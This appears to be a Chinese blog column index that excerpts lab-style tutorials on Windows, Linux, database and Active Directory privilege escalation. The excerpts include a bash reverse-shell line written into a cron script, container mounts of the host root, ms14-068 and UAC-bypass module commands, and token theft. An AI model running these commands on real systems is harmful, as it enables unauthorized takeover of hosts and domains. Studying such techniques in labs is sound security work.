#012权限提升
文章平均质量分 90
吃饱饭,练球
网络空间安全小小白
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
DAY143权限提升-Win系统权限提升篇&AD内网域控&NetLogon&ADCS&PAC&KDC&CVE漏洞
参考地址:https://cloud.tencent.com/developer/article/2097955。ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址。CVE-2020-1472是继MS17010之后好用的NetLogon特权域控提权漏洞,二、演示案例-WIN-AD域控提权-CVE-2020-1472。1.存在域,但当前用户不是域用户,提示说明权限不够。DC.xiaodi.local //域控名。2.存在域,并且当前用户是域用户。原创 2024-12-01 00:30:00 · 979 阅读 · 0 评论 -
DAY142权限提升-Linux系统权限提升篇&Vulnhub&Rbash绕过&Docker&LXD容器&History泄漏&shell交互
lxc config device add test test disk source=/ path=/mnt/root recursive=true //挂载镜像磁盘,镜像的/mnt/root目录就是真实下的/目录。docker run -v /:/mnt -it alpine //利用docker起一个镜像并把真机的/目录挂载到镜像的/mnt目录。cat /home/tom/.mysql_history //泄露root密码。cd /mnt/root/root //进入目录提权。原创 2024-12-01 00:30:00 · 1447 阅读 · 0 评论 -
DAY141权限提升-Linux系统权限提升篇&Vulnhub&Capability能力&LD_Preload加载&数据库等
cp /usr/share/exploitdb/exploits/linux/local/1518.c . //复制到当前所在文件夹。pty.spawn("/bin/bash")' //起一个交互式终端。/sbin/getcap -r / 2>/dev/null //查看所有能力。查看所有能力:getcap -r / 2>/dev/null。查看单个能力:getcap /usr/bin/php。删除能力:setcap -r /tmp/php。原创 2024-11-30 16:46:52 · 870 阅读 · 0 评论 -
DAY140权限提升-Linux系统权限提升篇&Vulnhub&PATH变量&NFS服务&Cron任务&配合SUID
echo "/bin/bash -i >& /dev/tcp/192.168.139.141/66 0>&1" >> /etc/script/CleaningScript.sh //把反弹shell命令写进这个文件里。find / -perm -u=s -type f 2>/dev/null //使用查看当前suid权限看看是否有/mnt/nfs/getroot文件。cd /mnt/nfs //目标机来到/mnt/nfs目录下。cat /etc/crontab //查看当前服务器的计划任务。原创 2024-11-30 16:43:28 · 1066 阅读 · 0 评论 -
DAY139权限提升-Linux系统权限提升篇&Vulnhub&辅助项目&SUID权限&SUDO指令&版本漏洞
在Linux/Unix中,当一个程序运行的时候,程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的(程序/文件)所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的权限以及所有者的UID和GID。SUDO权限是root把本来只能超级用户执行的命令赋予普通用户执行,系统管理员集中的管理用户使用权限和使用主机,配置文件:/etc/sudoers,除此配置之外的问题,SUDO还有两个CVE漏洞(CVE-2019-14287 CVE-2021-3156)。原创 2024-11-28 11:08:46 · 1516 阅读 · 0 评论 -
DAY138权限提升-Linux系统权限提升篇&内核溢出&辅助项目&Vulnhub&Dirty Pipe&Pwnkit&dirtycow
pty.spawn("/bin/bash")' //利用python起一个shell终端,该脏牛漏洞需要起一个终端才行。https://github.com/The-Z-Labs/linux-exploit-suggester(常用 ./sh文件)https://github.com/belane/linux-soft-exploit-suggester(py文件)https://github.com/jondonas/linux-exploit-suggester-2(pl文件)原创 2024-11-28 11:04:50 · 893 阅读 · 0 评论 -
DAY136权限提升-Win系统权限提升篇&计算机管理用户&进程注入&令牌窃取&服务启动&远程控制
而system权限是可以用(服务启动&远程控制、进程注入&令牌窃取等方法)降权到administrator、user权限的。普通用户是没办法用(服务启动&远程控制、进程注入&令牌窃取等方法)提权到administrator、system权限的。适用版本:windows 7、10、08、12、16、19、22,早期用at命令。3、计算机管理用户到System-进程注入&令牌窃取。steal_token PID //窃取进程令牌。spawnu PID //窃取进程令牌上线。当前受控机在内网域环境。原创 2024-11-27 10:13:42 · 825 阅读 · 0 评论 -
DAY137权限提升-Win系统权限提升篇&计算机用户&UAC绕过&DLL劫持&未引号路径
原理:Windows应用程序启动的时候需要DLL。use exploit/windows/local/bypassuac_silentcleanup //针对新版本的win10/win11等。use exploit/windows/local/bypassuac_sluihijack //针对新版本的win10/win11等。use exploit/windows/local/bypassua //针对旧版本的win7。信息收集-进程调试-制作dll并上传-替换dll-等待管理员启动应用成功。原创 2024-11-27 10:20:28 · 1148 阅读 · 0 评论 -
DAY135权限提升-系统权限提升篇&数据库提权&Postsql&Redis&第三方软件提权&密码凭据&钓鱼文件
远控类:Teamviewer 向日葵 Todesk VNC Radmin等。技术:写密钥ssh 计划任务 反弹shell CVE2022沙盒执行。密码类:各大浏览器 Xshell Navicat 3389 等。1、通过普通用户或Web用户收集或提取有价值凭据进行提升。服务类:FileZilla Serv-u Zend等。技术:CVE-2019-9193 UDF libc。文档类:Winrar WPS Office等。条件:利用未授权或密码连接后执行。条件:数据库用户密码。原创 2024-11-27 10:05:02 · 914 阅读 · 0 评论 -
DAY134权限提升-Windows权限提升篇&数据库篇&MYSQL&MSSQL&ORACLE&自动化项目
条件:ROOT密码(高版本的-secure-file-priv没有进行目录限制,如果进行了目录限制就会导致提权失败)-利用已知Web权限建立代理节点,然后自动化提权项目在连接这个代理节点(等同于本地连接)Oracle:(站库分离,非JSP,直接数据库到系统等)-利用已知权限执行SQL开启外联(让数据库支持外联)MSSQL:.NET+MSSQL 以web入口提权。3、Web到Win-数据库提权-Oracle。1、Web到Win-数据库提权-MSSQL。2、Web到Win-数据库提权-MYSQL。原创 2024-11-26 20:03:20 · 1377 阅读 · 1 评论 -
DAY133权限提升-Windows权限提升篇&溢出漏洞&土豆家族&通杀全系&补丁对比&EXP筛选
参考地址:https://mp.weixin.qq.com/s/OW4ybuqtErh_ovkTWLSr8w。解决工具或插件无法实时更新,又或者面对的操作系统较高的情况下人工操作更适合。土豆(potato)提权通常用在我们获取WEB/数据库权限的时候,windows提权用这个系列漏洞最多,成功率也最大。1、Web到Win-系统提权-土豆家族。2、Web到Win-系统提权-人工操作。1、Web权限提升及转移。2、系统权限提升及转移。3、宿主权限提升及转移。4、域控权限提升及转移。1、内核溢出漏洞提权。原创 2024-11-26 20:00:03 · 1101 阅读 · 0 评论 -
DAY132权限提升-Windows权限提升篇&溢出漏洞&宝塔面板Bypass&CS插件化&MSF模块化
如果使用集成软件搭建的网站被人拿下,那么别人拿到的权限就是运行集成软件当前用户的权限,一般都是administrator,由于使用宝塔的人多了,现在通过宝塔搭建的网站拿到webshell后,宝塔自身安全策略会导致有些命令执行不了的情况。Power Users:高级用户组,拥有比一般用户更高的系统权限,但比管理员组权限低。System:系统组,拥有管理系统资源的权限,包括文件、目录和注册表等。Users:用户组,一般用户的默认组别,拥有较低的系统权限。root用户:UID为0,拥有系统的完全控制权限。原创 2024-11-25 20:14:47 · 792 阅读 · 0 评论 -
DAY131权限提升-Web权限提升篇&划分获取&资产服务&后台系统&数据库管理&相互转移
计算机系统权限:系统内核漏洞,钓鱼后门攻击,主机软件安全直达或上述权限提升造成。宿主机权限:Docker不安全配置或漏洞权限提升直达(服务资产造成入口后提升)Web权限:源码查看,源码文件增删改查,磁盘文件文件夹查看(以权限配置为主)数据库权限:SQL注入,数据库泄漏,弱口令攻击,未授权访问等造成。数据库权限:操作数据库的权限,数据增删改查等(以数据库用户为主)后台权限:SQL注入,数据库泄漏,弱口令攻击,未授权访问等造成。后台权限:文章管理,站点管理,模版管理,数据管理,上传管理等。原创 2024-11-25 20:12:06 · 839 阅读 · 0 评论
分享